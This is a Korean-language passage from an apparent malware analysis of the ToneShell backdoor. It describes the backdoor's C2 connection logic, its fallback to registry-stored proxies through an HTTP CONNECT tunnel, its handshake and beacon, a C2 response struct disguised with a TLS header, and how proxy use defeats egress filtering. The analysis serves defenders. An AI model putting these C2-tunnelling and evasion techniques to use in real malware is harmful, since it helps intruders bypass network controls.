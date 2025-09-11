메인 루프 중에 ToneShell9은 C2 서버에 대한 소켓 연결을 설정하는 기능을 실행합니다. 첫 번째 SOCKADDR_IN 구조를 통해 연결을 시도하는 것으로 시작됩니다. 실패하면 멀웨어는 레지스트리에서 수집한 프록시 서버를 통해 소켓 연결을 설정하려고 시도합니다. 이는 각 C2 주소 문자열, 즉 위에서 분석된 샘플의 IP 주소 및 도메인에 대해 시도됩니다.

프록시 서버의 IP 주소를 확인하고 TCP 소켓을 통해 연결한 후 먼저 전송 및 수신 시간 초과를 1분으로 설정합니다. 다음으로 다음 연결 요청을 보냅니다.

CONNECT <C2 server>:<C2 port> HTTP/1.0

Host: <C2 server>:<C2 port>

Content-Length: 0

Proxy-Connection: Keep-Alive

Pragma: no-cache

프록시 서버가 2xx 상태 코드를 반환하면 연결이 성공적으로 설정된 것이며 원시 TCP 터널링을 사용할 준비가 된 것입니다. ToneShell9은 C2 서버와의 연결을 확인하기 위해 짧은 핸드셰이크 프로토콜을 사용하며 이 과정에서 서버의 IP와 포트도 전송합니다. 핸드셰이크에 성공하면 소켓에 대한 핸들이 C2_CONNECTION 구조체에 저장되고 소켓 시간 초과가 2분으로 설정됩니다. 그런 다음 ToneShell은 소켓을 통해 첫 번째 알림 비콘을 보냅니다.

처음 5바이트는 이전에 전송된 XOR 키를 통해 암호화된다는 점을 제외하고는 서버에서 유사한 응답을 다시 받을 것으로 예상합니다.

struct C2_RESPONSE

{

BYTE tls_header[3]; // 17 03 03

WORD payload_size; // big-endian

BYTE command_code;

BYTE shell_id;

BYTE data[];

}

ToneShell은 감염된 디바이스에 이미 구성된 프록시를 사용하여 다른 네트워크 트래픽과 효과적으로 혼합할 수 있습니다. 대규모 엔터프라이즈 환경에서는 송신 필터링을 적용하여 신뢰할 수 있는 게이트웨이를 통한 트래픽만 허용하는 경우가 많으며, 이로 인해 직접적인 C2 통신이 차단됩니다. 이러한 필터링을 우회할 수 있는 Toneshell의 추가 기능으로 보안이 철저한 네트워크 환경에서 작동할 수 있습니다.